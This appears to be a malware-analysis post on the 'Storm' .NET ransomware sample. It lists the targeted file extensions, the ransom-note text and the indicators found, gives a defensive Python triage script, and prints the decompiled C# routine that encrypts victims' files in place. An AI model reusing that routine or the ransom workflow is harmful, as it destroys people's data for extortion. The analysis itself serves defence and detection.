Today we are analysing a malware sample whose hash is 791b700810e356339066b67f2f4febc9089b5541d602946a243dfb15e6f3918e. It is referred to as the Storm ransomware sample.
[Figure: Storm Ransomware]
The sample is compiled with the .NET compiler. Here is the snapshot showing the .NET compiler detected in that file. Reversing such code is very much possible, so let's try it.
[Figure: .NET compiled]
Interesting strings present in the file (file offset, RVA, flag, string):
0000000052EF 0000004070EF 0 Property can only be set to Nothing
000000005337 000000407137 0 WinForms_RecursiveFormCreate
000000005371 000000407171 0 WinForms_SeeInnerException
0000000053CF 0000004071CF 0 .accdb
0000000053E7 0000004071E7 0 .aepx
00000000547B 00000040727B 0 .class
0000000054FD 0000004072FD 0 .docb
000000005509 000000407309 0 .docm
000000005515 000000407315 0 .docx
00000000552B 00000040732B 0 .dotm
000000005537 000000407337 0 .dotx
000000005593 000000407393 0 .idml
0000000055A9 0000004073A9 0 .indb
0000000055B5 0000004073B5 0 .indd
0000000055C1 0000004073C1 0 .indl
0000000055CD 0000004073CD 0 .indt
0000000055ED 0000004073ED 0 .java
0000000055F9 0000004073F9 0 .jpeg
000000005623 000000407423 0 .m3u8
000000005693 000000407493 0 .mpeg
00000000578F 00000040758F 0 .potm
00000000579B 00000040759B 0 .potx
0000000057A7 0000004075A7 0 .ppam
0000000057C7 0000004075C7 0 .ppsm
0000000057D3 0000004075D3 0 .ppsx
0000000057E9 0000004075E9 0 .pptm
0000000057F5 0000004075F5 0 .pptx
000000005801 000000407601 0 .prel
00000000580D 00000040760D 0 .prproj
0000000058A3 0000004076A3 0 .sldm
0000000058AF 0000004076AF 0 .sldx
000000005965 000000407765 0 .xlam
000000005999 000000407799 0 .xlsb
0000000059A5 0000004077A5 0 .xlsm
0000000059B1 0000004077B1 0 .xlsx
0000000059C7 0000004077C7 0 .xltm
0000000059D3 0000004077D3 0 .xltx
000000005A0F 00000040780F 0 Label1
000000005A1E 00000040781E 0 _______________________________________________________________________________________
000000005ACE 0000004078CE 0 Button1
000000005AE4 0000004078E4 0 Microsoft Sans Serif
000000005B0E 00000040790E 0 Label2
000000005B1C 00000040791C 0 Storm Ransomware
000000005B3E 00000040793E 0 RichTextBox1
000000005B5A 00000040795A 0 Label3
000000005B68 000000407968 0 Send mony to my bitcoin :
000000005B9C 00000040799C 0 Label5
000000005BB2 0000004079B2 0 Label6
000000005BC0 0000004079C0 0 Contact Me :
000000005BDC 0000004079DC 0 Button2
000000005BF6 0000004079F6 0 TextBox1
000000005C08 000000407A08 0 Form1
000000005C22 000000407A22 0 taskmgr.exe
000000005C3A 000000407A3A 0 ProcessHacker.exe
000000005C5E 000000407A5E 0 FullName
000000005C82 000000407A82 0 Hassan
000000005C90 000000407A90 0 HassanAmiri
000000005CA8 000000407AA8 0 Winrar
000000005CB7 000000407AB7 0 Hello You Are Hacked Now !! All your personal files have been encrypted ! if you want restore your data you have to pay ! Remember you can't restore your data without our decryptor !!!!
000000005E2B 000000407C2B 0 ertyuioppoiuhygtfrdeRFTGYHDEZEFFZEF
000000005E73 000000407C73 0 StormRansomware(at)gmail(dot)com
This list of strings gives more detail about the file extensions (file types) targeted by the Storm ransomware. It also reveals the functioning buttons of the ransom screen, such as "Send money to my bitcoin" and "Contact Me", and the email address used for contact: StormRansomware(at)gmail(dot)com.
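As an added example (not part of the original post), the following Python script parses a strings listing in the format shown above and pulls out the analyst-relevant items: the targeted extension list, the process names the sample references, de-obfuscated contact addresses and ransom-note text. The embedded `SAMPLE_DUMP` is a subset of the lines from the listing above; the regular expressions and the phrase list are my own assumptions about what counts as an indicator.

```python
import os
import re
from dataclasses import dataclass, field
from typing import Iterator, List, Tuple

# Subset of the strings listing from the post (file offset, RVA, flag, string),
# embedded so the script runs offline against realistic input.
SAMPLE_DUMP = """\
0000000052EF 0000004070EF 0 Property can only be set to Nothing
0000000053CF 0000004071CF 0 .accdb
000000005515 000000407315 0 .docx
0000000055F9 0000004073F9 0 .jpeg
00000000580D 00000040760D 0 .prproj
0000000059B1 0000004077B1 0 .xlsx
000000005B1C 00000040791C 0 Storm Ransomware
000000005B68 000000407968 0 Send mony to my bitcoin :
000000005C22 000000407A22 0 taskmgr.exe
000000005C3A 000000407A3A 0 ProcessHacker.exe
000000005CB7 000000407AB7 0 Hello You Are Hacked Now !! All your personal files have been encrypted ! if you want restore your data you have to pay ! Remember you can't restore your data without our decryptor !!!!
000000005E73 000000407C73 0 StormRansomware(at)gmail(dot)com
"""

# One listing line: <hex file offset> <hex RVA> <flag> <string>
LINE_RE = re.compile(r"^([0-9A-Fa-f]+)\s+([0-9A-Fa-f]+)\s+(\d+)\s+(.*)$")
# A bare extension token such as ".docx" (assumed shape: dot + up to 7 alphanumerics)
EXT_RE = re.compile(r"^\.[A-Za-z0-9]{1,7}$")
# Email address, matched after "(at)"/"(dot)" de-obfuscation
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Words whose co-occurrence marks ransom-note text (assumed heuristic)
RANSOM_PHRASES = ("encrypted", "decryptor", "bitcoin", "pay")


@dataclass
class StringsTriage:
    extensions: List[str] = field(default_factory=list)
    processes: List[str] = field(default_factory=list)
    contacts: List[str] = field(default_factory=list)
    ransom_note_lines: List[str] = field(default_factory=list)


def parse_strings_dump(text: str) -> Iterator[Tuple[int, int, int, str]]:
    """Yield (file_offset, rva, flag, string) per line; lines that do not match are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield int(m.group(1), 16), int(m.group(2), 16), int(m.group(3)), m.group(4)


def deobfuscate(s: str) -> str:
    """Undo the common "(at)"/"(dot)" spelling used to hide email addresses from scanners."""
    return s.replace("(at)", "@").replace("(dot)", ".")


def triage(text: str) -> StringsTriage:
    """Classify each string into the categories an analyst wants from a ransomware sample."""
    t = StringsTriage()
    for _offset, _rva, _flag, s in parse_strings_dump(text):
        lowered = s.lower()
        if EXT_RE.match(s):
            t.extensions.append(lowered)
        elif lowered.endswith(".exe"):
            t.processes.append(s)
        elif EMAIL_RE.search(deobfuscate(s)):
            t.contacts.append(EMAIL_RE.search(deobfuscate(s)).group(0))
        elif sum(p in lowered for p in RANSOM_PHRASES) >= 2:
            t.ransom_note_lines.append(s)
    return t


def is_targeted(path: str, extensions: List[str]) -> bool:
    """True if a file's extension is in the sample's target list (case-insensitive)."""
    return os.path.splitext(path)[1].lower() in set(extensions)


if __name__ == "__main__":
    result = triage(SAMPLE_DUMP)
    print("targeted extensions:", result.extensions)
    print("referenced processes:", result.processes)
    print("contact addresses:", result.contacts)
    print("ransom note:", result.ransom_note_lines)
```

The extracted extension list is what a defender feeds into backup prioritisation or a file-integrity watch, the process names (taskmgr.exe, ProcessHacker.exe) hint at anti-analysis behaviour worth confirming in the decompiled code, and the contact address goes straight into the IoC set.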
Possibly the email ID and password details will be there. We disassembled the code; please refer to the following snapshots:
[Figure: Email ID and password details]
[Figure: Process detail]
The following code snippet is the cryptography-related routine:
using System.IO;
using System.Security.Cryptography;
using System.Text;

// Decompiled encryption routine: 'nombre' is the path of the file to encrypt,
// 'password' is the key string.
public static void EC(string nombre, string password)
{
    // Key buffer: the password bytes (system default code page) are copied into a
    // 32-byte array and the remaining bytes stay zero. A password longer than
    // 32 bytes makes CopyTo throw. The same buffer is later used as both key and IV.
    byte[] array = new byte[32];
    Encoding.Default.GetBytes(password).CopyTo(array, 0);
    RijndaelManaged rijndaelManaged = new RijndaelManaged
    {
        Mode = CipherMode.CBC,
        KeySize = 256,
        BlockSize = 256,   // 32-byte blocks, so the IV is also 32 bytes
        Padding = PaddingMode.Zeros
    };
    byte[] array2 = File.ReadAllBytes(nombre);
    MemoryStream memoryStream = new MemoryStream();
    try
    {
        CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(array, array), CryptoStreamMode.Write);
        try
        {
            cryptoStream.Write(array2, 0, array2.Length);
            // As decompiled, ToArray() is called before the CryptoStream is flushed or
            // disposed, so any trailing partial block still buffered by the CryptoStream
            // has not reached memoryStream at this point.
            byte[] array3 = memoryStream.ToArray();
            // VB array-dimension artifact: array4 is simply a copy of array3.
            byte[] array4 = new byte[checked(array3.Length - 1 + 1)];
            array3.CopyTo(array4, 0);
            // The original file is overwritten in place with the ciphertext.
            File.WriteAllBytes(nombre, array4);
        }
        finally
        {
            // Closing blocks are not shown in the post's snapshot; they dispose the streams.
            cryptoStream.Dispose();
        }
    }
    finally
    {
        memoryStream.Dispose();
    }
}
Conclusion:
Currently the top AV vendors are detecting this variant, and the common detection name is MSIL crypter.